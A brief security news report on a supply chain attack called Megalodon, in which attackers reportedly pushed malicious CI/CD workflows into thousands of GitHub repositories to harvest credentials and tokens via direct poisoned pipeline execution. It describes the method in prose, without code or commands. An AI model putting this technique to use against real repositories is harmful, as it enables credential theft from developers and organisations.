ON May 18, 2026, a significant supply chain attack named **Megalodon** targeted over 5,500 public GitHub repositories in a 6-hour window. Attackers exploited weak branch protection to inject malicious CI/CD workflows designed to steal cloud credentials, SSH keys, and OAuth tokens. The attack utilized a **direct Poisoned Pipeline Execution (d-PPE)** technique, bypassing pull request reviews and executing commands to harvest sensitive information.
Affected repositories included notable organizations such as Tiledesk and Black-Iron-Project. The campaign's payload collected data via environment variable dumps and transmitted it to an external server, effectively leaving little trace. Security measures are necessary to strengthen branch protections, and further analysis is ongoing to assess the full impact of the attack.